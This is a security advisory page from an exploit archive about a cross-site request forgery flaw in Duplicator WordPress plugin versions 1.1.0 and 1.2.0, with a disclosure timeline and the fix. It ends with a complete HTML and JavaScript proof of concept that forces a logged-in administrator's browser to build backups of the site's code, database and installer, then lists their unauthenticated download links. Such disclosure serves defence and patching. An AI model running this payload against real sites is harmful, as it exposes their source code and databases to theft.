exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

WordPress Duplicator 1.1.0 / 1.2.0 Cross Site Request Forgery

WordPress Duplicator 1.1.0 / 1.2.0 Cross Site Request Forgery
Posted Feb 12, 2016
Authored by RatioSec Research

WordPress Duplicator plugin versions 1.1.0 and 1.2.0 suffers from a cross site request forgery vulnerability.

tags | exploit, csrf
SHA-256 | 342573c1ecd68024aff28d6cad156bddd3d61c5bc7ca94df51716fa2886b1e36

WordPress Duplicator 1.1.0 / 1.2.0 Cross Site Request Forgery

Change Mirror Download
-----------------------------------------------------------------------------------------------
RatioSec Research Security Advisory RS-2016-002
-----------------------------------------------------------------------------------------------

Duplicator Wordpress Plugin Code And Database Dump Via CSRF Vulnerability
-----------------------------------------------------------------------------------------------

Product: Duplicator WordPress Plugin
Vendor: Life In The Grid
Tested Versions: 1.1.0, 1.2.0
Other Vulnerable Versions: Prior versions may also be affected
Vendor Notification: 29th January, 2016
Advisory Publication: 9th February, 2016
CVE Reference: Pending
RatioSec Advisory Reference: RS-2016-002
Risk Level: High
CVSSv3 Base Score: AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N

-----------------------------------------------------------------------------------------------

RatioSec Research has discovered a cross-site request forgery
vulnerability in Duplicator WordPress Plugin which can be exploited to
generate and disclose the WordPress database and code backups.

The application allows users to perform certain actions via HTTP
requests without performing proper checks to verify the requests
validity. An authenticated user's browser can be forced to generate
and disclose the WordPress database and code backups via the
vulnerable backup function by tricking the user into visiting a
malicious web site.

-----------------------------------------------------------------------------------------------

Proof of Concept

The proof of concept HTML page, if visited by a logged-in
administrative user, raises two requests
(`/wp-admin/admin.php?page=duplicator&tab=new2` and
`/wp-admin/admin-ajax.php?action=duplicator_package_build`) forcing
the creation of the WordPress source code, database, and install
scripts backup in the paths
`/wp-snapshots/ratiosec_ratiosec_archive.zip`,
`/wp-snapshots/ratiosec_ratiosec_database.sql`, and
`/wp-snapshots/ratiosec_ratiosec_installer.php`. Once generated, the
backup archives can be downloaded by the attacker with no
authentication.

See the proof of concept code on the RatioSec Research website.
http://www.ratiosec.com/2016/duplicator-wordpress-plugin-source-database-disclosure-via-csrf/

-----------------------------------------------------------------------------------------------

Solution

Update to version 1.1.4.

-----------------------------------------------------------------------------------------------

Timeline

- First contact: 29th January, 2016
- Disclosure: 29th January, 2016. Preliminary date set to 19th, February 2016.
- Postponed: Date pushed back to 19th February, 2016
- Fixed in GIT: 6th February, 2016
- Fixed Release: 9th February, 2016
- Advisory Publication: 9th February, 2016

-----------------------------------------------------------------------------------------------

Advisory URL

http://www.ratiosec.com/2016/duplicator-wordpress-plugin-source-database-disclosure-via-csrf/

RatioSec Research

Mail: research at ratiosec dot com
Web: http://www.ratiosec.com/
Twitter: https://twitter.com/ratio_sec




==============
POC:

<html>
<body>
<script>

wordpress_root = "http://localhost/wordpress";

function submitRequest1()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", wordpress_root + "/wp-admin/admin.php?page=duplicator&tab=new2", true);
xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-GB,en;q=0.5");
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
xhr.withCredentials = true;
var body = "action=&package-hash=ratiosec&package-name=ratiosec&package-notes=&archive-format=ZIP&filter-dirs=&filter-exts=&dbhost=&dbport=&dbname=&dbuser=&url-new=";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
function submitRequest2()
{
var xhr = new XMLHttpRequest();
xhr.open("GET", wordpress_root + "/wp-admin/admin-ajax.php?action=duplicator_package_build", true);
xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-GB,en;q=0.5");
xhr.withCredentials = true;
var body = "";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
function printLinks()
{

var dumps = ["ratiosec_ratiosec_archive.zip", "ratiosec_ratiosec_database.sql", "ratiosec_ratiosec_installer.php"];
for(var a in dumps) {
var url = wordpress_root + '/wp-snapshots/' + dumps[a];
document.body.innerHTML += '<br/><a href="' + url + '">' + url + '</a>';
};
}
</script>
<form action="#">
<input type="button" value="Submit request" onclick="submitRequest1();setTimeout(submitRequest2,2000);setTimeout(printLinks,2500);" />
</form>
<p>Submit the CSRF request and wait few seconds to see below the public links of the dumps.</p>
</body>
</html>
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    0 Files
  • 20
    Mar 20th
    0 Files
  • 21
    Mar 21st
    0 Files
  • 22
    Mar 22nd
    0 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    0 Files
  • 26
    Mar 26th
    0 Files
  • 27
    Mar 27th
    0 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close